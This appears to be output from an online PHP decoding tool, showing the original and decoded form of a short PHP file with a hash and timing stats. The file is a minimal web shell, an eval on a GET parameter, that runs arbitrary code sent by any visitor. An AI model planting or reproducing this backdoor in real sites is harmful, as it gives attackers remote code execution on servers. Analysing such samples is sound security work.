Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php echo eval($_GET['r']); ?> ..

Decoded Output download

<?php
echo eval($_GET['r']);
?>

Did this file decode correctly?

Original Code

<?php
echo eval($_GET['r']);
?>

Function Calls

None

Variables

None

Stats

MD5 1046168a140f72aebefb9f6494cbe849
Eval Count 0
Decode Time 111 ms